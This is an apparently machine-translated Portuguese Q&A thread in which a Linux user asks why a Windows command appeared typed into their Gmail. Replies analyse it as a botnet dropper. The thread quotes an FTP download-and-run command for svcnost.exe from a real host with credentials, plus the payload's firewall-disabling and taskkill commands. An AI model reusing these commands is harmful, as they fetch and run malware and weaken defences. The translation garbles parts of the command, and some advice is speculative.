Como identificar se meu computador Linux foi hackeado?

128

Meu PC doméstico geralmente está ligado, mas o monitor está desligado. Esta noite cheguei em casa do trabalho e descobri o que parece ser uma tentativa de invasão: no meu navegador, meu Gmail estava aberto (era eu), mas estava no modo de composição com o seguinte no TOcampo:

md / c echo open cCTeamFtp.yi.org 21 >> usuário de ik e eco ccteam10 765824 >> binário de ik e eco >> binário de ik e eco >> obtenha svcnost.exe >> ik e eco bye >> ik e eco bye >> ik e ftp -n -v -s: ik e del ik & svcnost.exe & exit echo Você pertence

Parece-me o código de linha de comando do Windows e o mdinício do código combinado ao fato de o Gmail estar no modo de composição torna evidente que alguém tentou executar um cmdcomando. Acho que tive sorte de não executar o Windows neste PC, mas tenho outros que o fazem. É a primeira vez que algo assim acontece comigo. Eu não sou um guru do Linux e não estava executando nenhum outro programa além do Firefox na época.

Tenho certeza absoluta de que não escrevi isso e ninguém mais estava fisicamente no meu computador. Além disso, recentemente mudei minha senha do Google (e todas as minhas outras senhas) para algo assim, vMA8ogd7bvpara que eu não ache que alguém tenha invadido minha conta do Google.

O que acabou de acontecer? Como alguém pressiona as teclas do meu computador quando não é a antiga máquina Windows da avó que executa malware há anos, mas uma recente instalação recente do Ubuntu?

Atualização:
Deixe-me abordar alguns dos pontos e perguntas:

  • Estou na Áustria, no campo. Meu roteador WLAN executa o WPA2 / PSK e uma senha de segurança média que não está no dicionário; teria que ter força bruta e a menos de 50 metros daqui; não é provável que tenha sido hackeado.
  • Estou usando um teclado com fio USB, então é muito improvável que alguém possa estar ao alcance para invadir.
  • Eu não estava usando meu computador na época; só estava ocioso em casa enquanto eu estava no trabalho. É um PC nettop montado em monitor, por isso raramente o desligo.
  • A máquina tem apenas dois meses, apenas roda o Ubuntu e não estou usando software estranho ou visitando sites estranhos. É principalmente Stack Exchange, Gmail e jornais. Sem jogos. O Ubuntu está definido para se manter atualizado.
  • Não conheço nenhum serviço VNC em execução; Certamente não instalei ou habilitei um. Também não iniciei outros servidores. Não tenho certeza se algum está sendo executado no Ubuntu por padrão?
  • Conheço todos os endereços IP na atividade da conta do Gmail. Tenho certeza de que o Google não era uma entrada.
  • Encontrei um visualizador de arquivos de log , mas não sei o que procurar. Socorro?

O que realmente quero saber é, e o que realmente me faz sentir inseguro, é: como alguém da Internet pode gerar pressionamentos de tecla na minha máquina? Como posso evitar isso sem ser totalmente estúpido? Eu não sou um geek do Linux, sou um pai que mexe no Windows há mais de 20 anos e está cansado disso. E em todos os mais de 18 anos em que estou online, nunca vi pessoalmente nenhuma tentativa de hack, então isso é novo para mim.

Torben Gundtofte-Bruun
fonte
4
Alguém mais teve acesso ao seu computador ou você tem um teclado sem fio muito antigo? Além disso, o Ubuntu possui um servidor VNC embutido. Se isso é ativo, um roteiro aleatório em algum lugar poderia ter conectado e assumiu que era um computador com Windows, enviando as teclas Win + R, cmd ......
TuxRug
29
@torbengb: Sua postagem realmente me assusta ...
Mehrdad
9
Existem outros computadores na sua rede sem fio? Se o invasor quebrasse a segurança deles , ele entraria na sua rede local, o que poderia levar à quebra da caixa do Ubuntu de várias maneiras.
CarlF
4
@muntoo ... e tenho certeza de que você não anotou isso em nenhum lugar e também não usa nenhum aplicativo para gerenciá-los, certo? Não vamos começar a bash de senha; pelo menos minha senha não é password:-)
Torben Gundtofte-Bruun
6
Você tem um gato?
Zaki

Respostas:

66

Duvido que você tenha algo com que se preocupar. Provavelmente, foi um ataque de JavaScript que tentou fazer uma unidade por download . Se você está preocupado com isso, comece a usar os complementos NoScript e AdBlock Plus Firefox.

Mesmo visitando sites confiáveis, você não é seguro porque eles executam o código JavaScript de anunciantes de terceiros que podem ser maliciosos.

Peguei e executei em uma VM. Instalou o mirc e este é o log de status ... http://pastebin.com/Mn85akMk

É um ataque automatizado que está tentando fazer com que você faça o download do mIRC e entre em uma botnet que o transformará em um spambot ... Ele fez minha VM entrar e fazer uma conexão com vários endereços remotos diferentes, um dos quais autoemail-119.west320.com.

Ao executá-lo no Windows 7, tive que aceitar o prompt do UAC e permitir o acesso pelo firewall.

Parece haver toneladas de relatórios desse comando exato em outros fóruns, e alguém até diz que um arquivo torrent tentou executá-lo quando terminou o download ... Não tenho certeza de como isso seria possível.

Eu não usei isso sozinho, mas deve ser capaz de mostrar as conexões de rede atuais para que você possa ver se está conectado a algo fora da norma: http://netactview.sourceforge.net/download.html

Riguez
fonte
10
Por que todos os comentários (mesmo os altamente relevantes que descobriram que o script tentou abrir uma cmdjanela) foram excluídos !?
BlueRaja - Danny Pflughoeft
Eu estaria tão seguro com esse tipo de ataque se apenas começasse a usar o uBlock Origin?
precisa saber é o seguinte
42

Concordo com @ jb48394 que é provavelmente uma exploração de JavaScript, como tudo o mais nos dias de hoje.

O fato de ter tentado abrir uma cmdjanela (consulte o comentário de @ torbengb ) e executar um comando malicioso, em vez de apenas baixar o cavalo de Troia discretamente em segundo plano, sugere que ele explora alguma vulnerabilidade no Firefox, o que permite digitar as teclas, mas não execute o código.

Isso também explica por que essa exploração, que foi claramente escrita exclusivamente para Windows, também funcionaria no Linux: o Firefox executa o JavaScript da mesma maneira em todos os sistemas operacionais (pelo menos, ele tenta :)) . Se fosse causado por um estouro de buffer ou uma exploração semelhante destinada ao Windows, teria travado o programa.

Quanto à origem do código JavaScript - provavelmente um anúncio malicioso do Google (ciclo de anúncios no Gmail ao longo do dia) . Ele não iria ser a primeira vez .

BlueRaja - Danny Pflughoeft
fonte
4
Boas referências.
Kizzx2
9
Para os skimmers, o último "link" é na verdade cinco links separados.
PNF
Seria bastante chocante se fosse realmente uma exploração de Javascript, pois meu Firefox normalmente fica aberto por dias. No entanto, você precisa chamar a API especial para enviar chaves para outro sistema no Windows e provavelmente uma chamada de sistema diferente (se existir) no Linux. Como o envio de teclas não é uma operação Javascript normal, duvido que o Firefox implemente uma chamada de plataforma cruzada para isso.
billc.cn
1
@ billc.cn: Eu acredito que escrever no buffer do teclado PS / 2 funciona da mesma maneira, independentemente do sistema operacional .
BlueRaja - Danny Pflughoeft
12

Eu encontrei um ataque semelhante em outra máquina Linux. Parece que é algum tipo de comando FTP para Windows.

Shekhar
fonte
8
Mais precisamente, ele baixa e executa o arquivo ftp://ccteam10:[email protected]/svcnost.exeusando a ftpferramenta de linha de comando do Windows .
grawity
encontrei-o em pastebin too pastebin.com/FXwRpKH4
Shekhar
aqui é informação sobre o local whois.domaintools.com/216.210.179.67
Shekhar
9
É um pacote WinRAR SFX que contém uma instalação portátil do mIRC e um arquivo chamado "DriverUpdate.exe". DriverUpdate.exe executa (pelo menos) dois comandos de shell: netsh firewall set opmode disable e taskkill / F / IM VCSPAWN.EXE / T Também tenta (acho) adicionar die-freesms-seite.com à zona confiável do Internet Explorer e desvio de proxy.
Andrew Lambert
5

Isso não responde a toda a sua pergunta, mas no arquivo de log, procure por falhas nas tentativas de logon.

Se houver mais de cinco tentativas com falha no seu log, alguém tentou quebrar root. Se houver uma tentativa bem-sucedida de rootefetuar logon enquanto você estava fora do computador, MUDE SUA SENHA IMEDIATAMENTE !! Quero dizer AGORA! De preferência para algo alfanumérico e com cerca de 10 caracteres.

Com as mensagens que você recebeu (os echocomandos), isso realmente soa como um script imaturo infantil . Se fosse um hacker de verdade que sabia o que estava fazendo, você provavelmente ainda não saberia.

Nate Koppenhaver
fonte
2
Concordo que isso era evidentemente muito amador. Pelo menos eles não deveriam ter ecoado a sua propriedade no final. Me faz pensar se algum "hacker de verdade" já passou? Ou talvez eu deva estar perguntando, quantos?
Torben Gundtofte-Bruun
1
@torgengb: se o comando foi executado em uma janela do prompt de comando, você não vê o eco (por causa da &exit)
BlueRaja - Danny Pflughoeft
-1

whois relatórios west320.com são de propriedade da Microsoft.

UPnP e Vino (Sistema -> Preferências -> Área de Trabalho Remota) combinados com uma senha fraca do Ubuntu?

Você usou repositórios fora do padrão?

A DEF CON realiza anualmente uma competição de Wi-Fi a que distância um ponto de acesso Wi-Fi pode ser alcançado - a última vez que ouvi dizer que era 250 milhas.

Se você realmente quer ter medo, veja as capturas de tela de um centro de comando e controle de uma botnet Zeus . Nenhuma máquina é segura, mas o Firefox no Linux é mais seguro que o resto. Melhor ainda, se você executar o SELinux .

rjt
fonte
1
O autor desta exploração claramente não tinha intenção de executá-lo no Linux, então duvido que tenha algo a ver com um utilitário gnome vulnerável ou com uma senha fraca (o OP já mencionou que ele tem uma senha segura)
BlueRaja - Danny Pflughoeft
Na verdade, ele não menciona ter uma senha do Ubuntu, apenas uma senha do Gmail e sem fio. Um garoto que executa metasploit pode nem conhecer o Linux, apenas vê o VNC. Provavelmente é um ataque de javascript.
RJT